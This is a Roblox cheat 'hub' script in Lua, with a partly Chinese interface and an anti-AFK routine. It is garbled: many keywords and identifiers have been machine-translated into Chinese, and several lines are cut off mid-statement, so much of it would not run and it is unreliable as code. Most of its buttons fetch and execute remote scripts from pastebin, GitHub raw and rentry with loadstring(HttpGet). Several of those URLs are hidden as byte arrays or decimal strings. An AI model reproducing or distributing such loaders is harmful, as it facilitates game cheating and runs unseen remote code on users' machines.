local core GUI = game:GetService(" starter GUI ")core GUI:set core(" send notification "，{ Title = "鬼"，Text = "耐心等待（反挂机已开启)"，Duration = 5，})打印("反挂机开启”)local vu = game:GetService(" VirtualUser ")game:GetService(" Players ")local player . idled:connect(function()vu:button 2 down(vector 2 . new(0，0)，workspace。current camera . c frame)wait(1)vu:button 2 up(vector 2 . new(0，0)，workspace。current camera . CFrame)end)
local Orion lib = loadstring(game:http get((' https://raw . githubusercontent . com/shlexware/Orion/main/source ')))()
local Window = Orion lib:make Window({ Name = "鬼脚本"，HidePremium = false，SaveConfig = false，IntroText = "欢迎使用"，配置文件夹= "欢迎使用"})

local Tab = Window:MakeTab({
name = "と信息』",
Icon = "rbxassetid://7734068321 "，
PremiumOnly = false
})

制表符:添加段落("作者信息")
制表符:添加标签("作者：鬼")
制表符:添加标签("帮助者：傻猫")
选项卡:添加按钮({
Name = "点击复制作者qq”，
回调=函数()
setclipboard("3368904118 ")
结束
})
制表符:添加标签(" ")
关于:标签("你的账号年龄:"..玩家。会计.."天")
关于:标签("你的注入器:"..identifyexecutor())
关于:标签("你的用户名:"..游戏。玩家. LocalPlayer.Character.Name)
关于:标签("你现在的服务器名称:"..game:get service(" MarketplaceService "):get product info(game。PlaceId)。姓名)
关于:标签("你现在的服务器id:"..游戏。GameId)
关于:标签("你的用户ID:"..游戏。Players.LocalPlayer.UserId)
关于:标签("获取客户端ID:"..game:get service(" RbxAnalyticsService "):get clientid())

local Tab = Window:MakeTab({
name = "と公告』",
Icon = "rbxassetid://7734068321 "，
PremiumOnly = false
})

制表符:添加段落("鬼脚本")
制表符:添加标签("已修复,已知bug”)
制表符:添加标签("发现病菌加3368904118")
制表符:添加标签("此脚本完全免费")
制表符:添加标签("倒卖没( )")


local Tab = Window:MakeTab({
Name = "通用",
Icon = "rbxassetid://7734068321 "，
PremiumOnly = false
})

选项卡:添加按钮({
Name = "华光影",
回调=函数()
loadstring(game:http get(" https://pastebin . com/raw/arzRCgwS "))()
结束
})

选项卡:添加按钮({
Name = "光影_2",
默认=假，
回调=函数()
loadstring(game:http get(" https://raw . githubusercontent . com/mze EN2424/Graphics/main/Graphics . XML "))()
结束
})

选项卡:添加按钮({
Name = "超高画质",
回调=函数()
loadstring(game:http get(" https://pastebin . com/raw/jHBfJYmS "))()
结束
})    

选项卡:添加按钮({
Name = "旋转",
回调=函数()
loadstring(game:http get(' https://pastebin . com/raw/r 97d 7 ds 0 '，true))()
结束
})

Tab:AddToggle({
	Name = "夜视",
	Default = false,
	Callback = function(Value)
		if Value then
		    game.Lighting.Ambient = Color3.new(1, 1, 1)
		else
		    game.Lighting.Ambient = Color3.new(0, 0, 0)
		end
	end
})
 
Tab:AddButton({
	Name = "鬼飞车",
	Callback = function()
loadstring(game:HttpGet("https://pastebin.com/raw/MHE1cbWF"))()
	end
})

Tab:AddButton({
	Name = "爬墙",
	Callback = function()
loadstring(game:HttpGet("https://pastebin.com/raw/zXk4Rq2r"))()
end
})


Tab:AddButton({
	Name = "电脑键盘",
	Callback = function()
     loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))()
  	end    
})

Tab:AddButton({
	Name = "踏空行走",
	Callback = function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/Float'))()
	end
})
Tab:AddButton({
	Name = "甩飞",
	Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/dingding123hhh/hknvh/main/%E7%94%A9%E9%A3%9E.txt"))()
	end
})





local Tab = Window:MakeTab({
    Name = "其他脚本",
    Icon = "rbxassetid://7734068321",
    PremiumOnly = false
})

Tab:AddButton({
    Name = "秋",
    Callback = function()
    local SCC_CharPool={
[1]= tostring(utf8.char((function() return table.unpack({104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,87,83,56,53,55,57,54,48,47,45,47,109,97,105,110,47,37,69,55,37,65,55,37,56,66,37,67,50,37,66,55,37,69,56,37,56,55,37,65,65,37,69,53,37,56,56,37,66,54,37,69,56,37,56,52,37,57,65,37,69,54,37,57,67,37,65,67,37,69,54,37,57,54,37,66,48,37,69,54,37,66,65,37,57,48,37,69,55,37,65,48,37,56,49,46,116,120,116})end)()))}
loadstring(game:HttpGet(SCC_CharPool[1]))()
    end
})

Tab:AddButton({
    Name = "杯脚本",
    Callback = function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/zuohongjian/bjb/main/bjb"))()
    end
})

Tab:AddButton({
    Name = "云(白灰)",
    Callback = function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/XiaoYunCN/6666666666/main/%E4%BA%91%E8%84%9A%E6%9C%AC%E6%B5%8B%E8%AF%95%E7%89%88%E4%BA%91%E8%84%9A%E6%9C%AC%E6%B5%8B%E8%AF%95%E7%89%88Xiao%20Yun.lua"))()
    end
})

Tab:AddButton({
    Name = "核脚本",
    Callback = function()
    getgenv().he="作者鱼"loadstring(game:HelpGet("https://pastebin.com/raw/2WmdapD2"))()
    end
})

Tab:AddButton({
    Name = "剑客v3",
    Callback = function()
   jianke_V3 = "作者_初夏"jianke = "剑客QQ群347724155"loadstring(game:HttpGet(('https://raw.githubusercontent.com/jiankeQWQ/jiankeV3/main/jianke_V3')))()
    end
})

Tab:AddButton({
    Name = "XC，卡密a",
    Callback = function()
getgenv()。XC= "作者XC”loadstring(游戏:http get(" https://pastebin . com/raw/pafzyx 0 f "))()
结束
})

选项卡:添加按钮({
Name = "阿尔宙斯",
回调=函数()
loadstring(游戏:http get(" https://raw。githubusercontent。com/AZYsGithub/chillz-workshop/main/阿尔宙斯%20X%20V3 "))()
结束
})

选项卡:添加按钮({
Name = "忍脚本",
回调=函数()
getgenv()ren 666 = "忍脚本,加载时间长请耐心" loadstring(game:http get(utf8 . char((function()return table . unpack({ 104，116，116，112，115，58，47，47，112，97，115，116，101，98，105，110，46，99，111，109，47，114，97，119，47，90，77，115，67
结束
})

选项卡:添加按钮({
Name = "神光脚本",
回调=函数()
loadstring(game:http get(utf8 . char((function()return table . unpack({ 104，116，116，112，115，58，47，47，112，97，115，116，101，98，105，110，46，99，111，109，47，114，97，119，47，56，102，50，76
结束
})

选项卡:添加按钮({
Name = "青脚本",
回调=函数()
loadstring(game:http get(' https://rentry . co/CT 293/raw ')()
结束
})


选项卡:添加按钮({
Name = "鸭枢纽”，
回调=函数()
loadstring(game:http get(utf8 . char((function()return table . unpack({ 104，116，116，112，115，58，47，47，112，97，115，116，101，98，105，110，46，99，111，109，47，114，97，119，47，81，89，49，113，
结束
})

选项卡:添加按钮({
Name = "青蛙",
回调=函数()
   
getgenv()。eom = "青蛙"
loadstring(" 108 111 97 100 115 116 114 105 110 103 40 103 97 109 101 58 72 116 116 112 71 101 116 40 39 104 116 116 116 112 115 58 47 47 112 97 115 116 101 98 105 110 46 99 1111 109 47
结束
})

选项卡:添加按钮({
Name = "地岩",
	Callback = function()
loadstring(" 108 111 97 100 115 116 114 105 110 103 40 103 97 109 101 58 72 116 116 112 71 101 116 40 34 104 116 116 116 112 115 58 47 47 114 97 119 46 103 105 116 104 1117 98 1117 1115 1115 112 97 99 101 115 45 98 108 97 110 107 47 109 97 105 110 47 37 69 55 37 57 57 37 66 68 34 41 41 40 41")()
结束
})

选项卡:添加按钮({
名称=”冰”,
回调=函数()
loadstring(game:HttpGet("https://pastebin.com/raw/GR4ChWKv")")
    end
})

选项卡:添加按钮({
名称=”Stupid Drehbuch”,
回调=函数()
loadstring(game:http get(“https://raw。githubusercontent。com/sharkshark/shark-shark-shark-shark/main/shark-scripttxt,true()
结束
})



OrionLib:Init()
